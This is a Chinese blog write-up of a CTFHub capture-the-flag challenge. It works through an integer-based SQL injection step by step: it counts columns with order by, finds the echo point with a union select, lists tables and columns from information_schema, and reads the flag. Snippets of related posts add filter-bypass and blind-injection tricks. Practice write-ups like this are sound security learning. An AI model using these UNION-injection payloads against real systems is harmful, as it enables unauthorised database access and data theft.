CTFHUB 2017-赛客夏令营-Web-injection

最新推荐文章于 2024-04-02 22:43:13 发布
最新推荐文章于 2024-04-02 22:43:13 发布
阅读量844 收藏 3
点赞数 3
分类专栏: CTFHub WEB Writeup 文章标签: 2017-赛客夏令营 SQL注入 writeup BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109149901
版权

2017-赛客夏令营-Web-injection

启动靶机,打开环境:

在这里插入图片描述

页面只有一句话:

Practice makes perfect.(实践使人完美。)

观察到链接中存在GET传参:
在这里插入图片描述

根据题目名与连接中的GET传参判断应该为注入

输入'(单引号)查看,并无回显,判断为整形注入
尝试查看列数:

1 order by 2 #

成功回显,推断其有两列
在这里插入图片描述
继续判断其回显点位:

1111 union select 11,22 #

得到回显内容:22
在这里插入图片描述
判断出22为回显点位,查看当前数据库版本信息:

1111 union select 11,version(); #

在这里插入图片描述
继续查看数据库名:

1111 union select 11,database(); #

在这里插入图片描述
查询到当前数据库名为:ctfhub,继续查询该数据库中的表名:

11111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

通过group_concat()函数将所有的表查询出来,得到flaginfo两个表:

在这里插入图片描述
继续查询flag表中的列:

11111 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #

查询到flag表中只有flag一列:
在这里插入图片描述
查看flag列中的内容:

11111 union select 1,flag from ctfhub.flag #

在这里插入图片描述

得到flag
很基础的SQL注入

Senimo_
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB 2017-赛客夏令营-Web-Injection V2.0
mutou990的博客
08-13 728
参考:https://blog.csdn.net/Mr_Shiyang/article/details/107974827 登陆页面如图所示 用户登陆两种业务查询方式: 一种是直接对用户输入的账号名和密码进行查询 另一种是针对用户输入的账号名进行查询对应的密码,再和用户输入的密码做比较 step1: 开始输入username=1,admin=1,提示用户名不存在,第二次输入admin:1 提示密码错误,那么我们可以确定应该是第二种业务查询模式,否则应当响应用户名或密码输入错误 第一想法尝试爆破数据库,找
CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注
Senimo
03-24 1627
整数型注入 首先输入1查看回显: 可以看到返回了SQL语句及ID和Data数据,查看列数: 1 order by 2 # 当列数为2时回显正常,接着判断回显位: 1111 union select 11,22 # 可以判断出回显点位如上,查看当前数据库版本及数据库名: 1111 union select version(),database() # 查询到当前数据库名为:sqli,...
2017-赛客夏令营-Web-injection
抒情诗
05-08 179
看题目名字,应该是一道SQL注入。首先,根据下面的payload,1=1时返回为错误界面,1=2时返回正确界面,判断是数字型布尔盲注。使用sqlmap可以解决,这里方便起见就不写脚本浪费时间了。跑出结果。
2017-赛客夏令营-Web全家桶
会下雪的晴天
09-07 370
题目来自CTFHub,感谢平台的复现环境 2017-赛客夏令营weakphprandominjection weakphp 知识点:git源码泄露;php弱类型;md5碰撞 源码没看到什么东西,抓包看看,没发现啥,扫描器启动233 很明显了,git泄露,用GitHack恢复一下 进入dist目录,查看恢复源码 主要绕过(md5($user) == md5($pass)) and ($user != $pass),要求user与pass不同,但其md5加密后却相同,典型的md5碰撞。 .
2017-赛客夏令营Web-injectionsql注入
最新发布
weixin_46954909的博客
04-02 391
具体可参考:(整型注入例子)(时间盲注例子)拿到题目id=1 有回显id=1 and 1=1 有回显id=1 and 1=2 无回显1 order by 2 #有回显1 order by 3 #无回显故有两列,即可以构造函数。得到库名:ctfhub得到表名:flag和info得到列名:flag得到flag以下是图片展示,如果不想看可跳,下面有工具的时间盲注。
2017-赛客夏令营-Web-Injection V2.0
feng的博客
11-06 376
WP 还是一道SQL注入的题目。经过尝试,用户名是admin,但是过滤了空格和括号。空格可以用/**/或者TAB来绕过,但是括号的过滤导致了各种函数都不能使用。 我在网上查找绕过括号过滤的方式,找到了order by盲注,文章如下: sql注入之order by注入 本来我以为的是要不断的爆破密码,但是我直接就爆出flag了: 本来这种方式的用法是这样的,如果你输入的密码比真实的密码小,就会回显admin的结果。如果你输入的密码比真实的密码大,就会回显你select的用户名为1的结果。但是这里却直接爆了f
employee-crud
08-01
Web开发领域,"CRUD"(Create,Read,Update,Delete)是数据库操作的四大基本功能,用于创建、读取、更新和删除数据。本项目"employee-crud"提供了一套完整的基于Java Servlet、JSP和JDBC技术实现的员工信息管理...
赛客乐U无线路由器-SR1B编程器固件备份、UBOOT、N14U、rippleos.zip
08-01
有编程器很好刷,亲测可用。 1、用编程器刷入UBOOT 2、按住菊花插电源,所有绿灯连闪三次后松开。 3、在浏览器中输入192.168.1.1选择想刷的固件。 所有固件都测试过可以刷入并启动正常进入界面,其它的自行研究了!
rippleos 小博带高级店铺
05-08
带高级店铺,今年年底高级店铺到期。
JavaScript总结
03-15
JavaScript 基础知识总结 JavaScript 是一种高级的、动态的、弱类型的编程语言,主要用于客户端脚本编程。下面是 JavaScript 的基础知识总结。 ### 变量和数据类型 在 JavaScript 中,变量是用来存储值的容器。...
Injection V2.0 2017-赛客夏令营-Web-Injection V2.0
xzz2333的博客
11-12 8477
拿到题目首先先随便输一下,发现用户名是Admin Admin’——用户名错误 Admin#——用户名错误 Admin’#——密码错误 既然会分开用户名和密码,那就是分开检验的 因此猜测格式是 select password from - where username = ‘’ if(password = $password) 过滤单词输入后会显示Hack! 过滤了order by / limit / and,union,select 后不能加东西 / 然后抓包发现是在空格处加上了’+'因此导致系统判断是Ha
CTFHUB-技能树-Web题-SQL注入-字符型注入
Static______的博客
03-29 414
对于字符型注入,可在url中输入。由此判断回显字段为1,2字段。由此判断字段数为两个。
CTFHUB技能树详解(最全、最细、最易懂)
it_wzb的博客
09-29 5463
最近闲的无聊,玩玩CTF吧,并把自己的解题思路分享给大家。大佬多指教。
题解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2234
数据库注入
CTFHUB技能树SQL注入
2401_82985722的博客
03-26 796
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
CTFHUB技能树SQL注入整数型和字符型注入
zw1358978796的博客
03-02 448
这里写目录标题一整数型注入二字符型注入 一整数型注入 1在url地址栏中id属性後面添加 id =1 and 1=1 查看是否报错,添加后发现能正常访问,就将代码改为 id =1 and 1=2 添加代码后发现会出现报错,此时说明有sql注入点 直接进入第二步,查询字段使用: id=1 and 1=1 order by 1 id=1 and 1=1 order by 2 id=1 and 1=1 order by 3 将数值改到3时,发现报错,此时发现表中只有两个字段 进入第三步,使用sql语句
CTFHUB-布尔盲注
Web学习之路
03-24 1029
true 与 false
CTFHub - 字符型注入
Have_a_great_day的博客
09-08 458
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值